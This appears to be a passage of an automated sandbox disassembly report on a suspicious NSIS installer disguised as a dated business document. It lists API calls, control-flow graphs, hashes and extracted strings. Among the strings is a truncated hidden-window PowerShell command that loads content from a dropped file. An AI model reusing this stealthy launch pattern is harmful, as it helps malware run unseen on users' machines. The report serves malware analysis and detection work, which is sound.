87 403a5d-403a83 call 405c4d lstrlenW call 406682 
83->87 88 403c54 84->88 89 403c58-403c5c ExitProcess 84->89 92 403be6-403c14 LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403c1a-403c28 call 406a76 85->93 86->64 106 403a2e-403a44 call 406682 * 2 86->106 110 403a94-403aac 87->110 111 403a85-403a8f call 406682 87->111 88->89 97 403a06-403a0a 91->97 98 4039ff-403a04 91->98 92->93 104 403c36-403c41 ExitWindowsEx 93->104 105 403c2a-403c34 93->105 97->91 99 403a0c 97->99 98->97 98->99 99->83 104->84 108 403c43-403c45 call 40140b 104->108 105->104 105->108 106->71 108->84 116 403ab1-403ab5 110->116 111->110 118 403aba-403ae4 wsprintfW call 4066bf 116->118 122 403ae6-403aeb call 405bd6 118->122 123 403aed call 405c30 118->123 127 403af2-403af4 122->127 123->127 128 403b30-403b4f SetCurrentDirectoryW call 406442 CopyFileW 127->128 129 403af6-403b00 GetFileAttributesW 127->129 137 403b51-403b72 call 406442 call 4066bf call 405c65 128->137 138 403b8e 128->138 130 403b21-403b2c 129->130 131 403b02-403b0b DeleteFileW 129->131 130->116 134 403b2e 130->134 131->130 133 403b0d-403b1f call 405d8e 131->133 133->118 133->130 134->64 146 403b74-403b7e 137->146 147 403bb8-403bc4 CloseHandle 137->147 138->64 146->138 148 403b80-403b88 call 4069df 146->148 147->138 148->118 148->138
                                                      APIs
                                                      • SetErrorMode.KERNELBASE ref: 00403668
                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
                                                      • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
                                                      • OleInitialize.OLE32(00000000), ref: 00403783
                                                      • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
                                                      • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",00000020,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403945
                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403961
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
                                                      • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67
                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                      • wsprintfW.USER32 ref: 00403AC4
                                                      • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
                                                      • DeleteFileW.KERNEL32(0042C800), ref: 00403B03
                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31
                                                        • Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C
                                                      • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47
                                                        • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                        • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                        • Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(74DF3420,00425F98,00425750,004060A2,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
                                                        • Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6
                                                      • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
                                                      • ExitProcess.KERNEL32 ref: 00403BB2
                                                      • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
                                                      • ExitProcess.KERNEL32 ref: 00403C5C
                                                        • Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                      • String ID: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"$"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                      • API String ID: 1813718867-2290975031
                                                      • Opcode ID: cb08dbe130f91360e7a1dfc8e1a880fb8121424293655edcd1d70ad09613bc60
                                                      • Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
                                                      • Opcode Fuzzy Hash: cb08dbe130f91360e7a1dfc8e1a880fb8121424293655edcd1d70ad09613bc60
                                                      • Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 151 405846-405861 152 4059f0-4059f7 151->152 153 405867-40592e GetDlgItem * 3 call 404636 call 404f8f GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 405a21-405a2e 152->155 156 4059f9-405a1b GetDlgItem CreateThread FindCloseChangeNotification 152->156 171 405930-40594a SendMessageW * 2 153->171 172 40594c-40594f 153->172 157 405a30-405a36 155->157 158 405a4c-405a56 155->158 156->155 160 405a71-405a7a call 404668 157->160 161 405a38-405a47 ShowWindow * 2 call 404636 157->161 162 405a58-405a5e 158->162 163 405aac-405ab0 158->163 175 405a7f-405a83 160->175 161->158 168 405a60-405a6c call 4045da 162->168 169 405a86-405a96 ShowWindow 162->169 163->160 166 405ab2-405ab8 163->166 166->160 173 405aba-405acd SendMessageW 166->173 168->160 176 405aa6-405aa7 call 4045da 169->176 177 405a98-405aa1 call 405707 169->177 171->172 178 405951-40595d SendMessageW 172->178 179 40595f-405976 call 404601 172->179 180 405ad3-405afe CreatePopupMenu call 4066bf AppendMenuW 173->180 181 405bcf-405bd1 173->181 176->163 177->176 178->179 190 405978-40598c ShowWindow 179->190 191 4059ac-4059cd GetDlgItem SendMessageW 179->191 188 405b00-405b10 GetWindowRect 180->188 189 405b13-405b28 TrackPopupMenu 180->189 181->175 188->189 189->181 192 405b2e-405b45 189->192 193 40599b 190->193 194 40598e-405999 ShowWindow 190->194 191->181 195 4059d3-4059eb SendMessageW * 2 191->195 196 405b4a-405b65 SendMessageW 192->196 197 4059a1-4059a7 call 404636 193->197 194->197 195->181 196->196 198 405b67-405b8a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405b8c-405bb3 SendMessageW 198->200 200->200 201 405bb5-405bc9 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->181
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 004058A4
                                                      • GetDlgItem.USER32(?,000003EE), ref: 004058B3
                                                      • GetClientRect.USER32(?,?), ref: 004058F0
                                                      • GetSystemMetrics.USER32(00000002), ref: 004058F7
                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
                                                      • ShowWindow.USER32(?,00000008), ref: 00405993
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004059B4
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
                                                      • GetDlgItem.USER32(?,000003F8), ref: 004058C2
                                                        • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405A06
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405A1B
                                                      • ShowWindow.USER32(00000000), ref: 00405A3F
                                                      • ShowWindow.USER32(?,00000008), ref: 00405A44
                                                      • ShowWindow.USER32(00000008), ref: 00405A8E
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
                                                      • CreatePopupMenu.USER32 ref: 00405AD3
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
                                                      • GetWindowRect.USER32(?,?), ref: 00405B07
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
                                                      • OpenClipboard.USER32(00000000), ref: 00405B68
                                                      • EmptyClipboard.USER32 ref: 00405B6E
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405B84
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
                                                      • CloseClipboard.USER32 ref: 00405BC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                      • String ID: H/B${$m
                                                      • API String ID: 4154960007-2438130757
                                                      • Opcode ID: 4ad71a5ae84d1442ca64332f301171ed24ad3ca4da0b040a8c0bb5ec3df77bcf
                                                      • Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
                                                      • Opcode Fuzzy Hash: 4ad71a5ae84d1442ca64332f301171ed24ad3ca4da0b040a8c0bb5ec3df77bcf
                                                      • Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 515 405d8e-405db4 call 406059 518 405db6-405dc8 DeleteFileW 515->518 519 405dcd-405dd4 515->519 520 405f4a-405f4e 518->520 521 405dd6-405dd8 519->521 522 405de7-405df7 call 406682 519->522 523 405ef8-405efd 521->523 524 405dde-405de1 521->524 528 405e06-405e07 call 405f9d 522->528 529 405df9-405e04 lstrcatW 522->529 523->520 527 405eff-405f02 523->527 524->522 524->523 530 405f04-405f0a 527->530 531 405f0c-405f14 call 4069df 527->531 532 405e0c-405e10 528->532 529->532 530->520 531->520 539 405f16-405f2a call 405f51 call 405d46 531->539 535 405e12-405e1a 532->535 536 405e1c-405e22 lstrcatW 532->536 535->536 538 405e27-405e43 lstrlenW FindFirstFileW 535->538 536->538 540 405e49-405e51 538->540 541 405eed-405ef1 538->541 555 405f42-405f45 call 405707 539->555 556 405f2c-405f2f 539->556 545 405e71-405e85 call 406682 540->545 546 405e53-405e5b 540->546 541->523 544 405ef3 541->544 544->523 557 405e87-405e8f 545->557 558 405e9c-405ea7 call 405d46 545->558 549 405ed0-405ee0 FindNextFileW 546->549 550 405e5d-405e65 546->550 549->540 554 405ee6-405ee7 FindClose 549->554 550->545 551 405e67-405e6f 550->551 551->545 551->549 554->541 555->520 556->530 559 405f31-405f40 call 405707 call 406442 556->559 557->549 560 405e91-405e9a call 405d8e 557->560 568 405ec8-405ecb call 405707 558->568 569 405ea9-405eac 558->569 559->520 560->549 568->549 572 405ec0-405ec6 569->572 573 405eae-405ebe call 405707 call 406442 569->573 572->549 573->549
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 00405DB7
                                                      • lstrcatW.KERNEL32(00424F50,\*.*), ref: 00405DFF
                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405E22
                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 00405E28
                                                      • FindFirstFileW.KERNELBASE(00424F50,?,?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 00405E38
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
                                                      • FindClose.KERNEL32(00000000), ref: 00405EE7
                                                      Strings
                                                      • "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe", xrefs: 00405D97
                                                      • POB, xrefs: 00405DE7
                                                      • \*.*, xrefs: 00405DF9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"$POB$\*.*
                                                      • API String ID: 2035342205-3595412467
                                                      • Opcode ID: 5bbbe9736573e0873f2e1386b99e889a7b8e3f986854e9af084b80f90e64b115
                                                      • Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
                                                      • Opcode Fuzzy Hash: 5bbbe9736573e0873f2e1386b99e889a7b8e3f986854e9af084b80f90e64b115
                                                      • Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph
                                                       (rendered graph not recoverable; the node/edge listing covered basic blocks 0x406da0 to 0x40763e, with GlobalFree at 0x406ca5 and 0x406d1c and GlobalAlloc at 0x406cae and 0x406d25)
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                      • Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
                                                      • Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                      • Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(74DF3420,00425F98,00425750,004060A2,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
                                                      • FindClose.KERNEL32(00000000), ref: 004069F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                      • Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
                                                      • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                      • Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph
                                                       (rendered graph not recoverable; the node/edge listing covered basic blocks 0x404102 to 0x4045d7 of this dialog procedure, including the DestroyWindow/EndDialog block at 0x40458c and the CreateDialogParamW block at 0x4044e6; the APIs it references are listed below)
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
                                                      • ShowWindow.USER32(?), ref: 0040415E
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404170
                                                      • ShowWindow.USER32(?,00000004), ref: 00404189
                                                      • DestroyWindow.USER32 ref: 0040419D
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
                                                      • GetDlgItem.USER32(?,?), ref: 004041D5
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
                                                      • IsWindowEnabled.USER32(00000000), ref: 004041F0
                                                      • GetDlgItem.USER32(?,00000001), ref: 0040429B
                                                      • GetDlgItem.USER32(?,00000002), ref: 004042A5
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404310
                                                      • GetDlgItem.USER32(?,00000003), ref: 004043B6
                                                      • ShowWindow.USER32(00000000,?), ref: 004043D7
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043E9
                                                      • EnableWindow.USER32(?,?), ref: 00404404
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040441A
                                                      • EnableMenuItem.USER32(00000000), ref: 00404421
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404439
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
                                                      • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
                                                      • SetWindowTextW.USER32(?,00422F48), ref: 0040448A
                                                      • ShowWindow.USER32(?,0000000A), ref: 004045BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: H/B$m
                                                      • API String ID: 121052019-3763849374
                                                      • Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
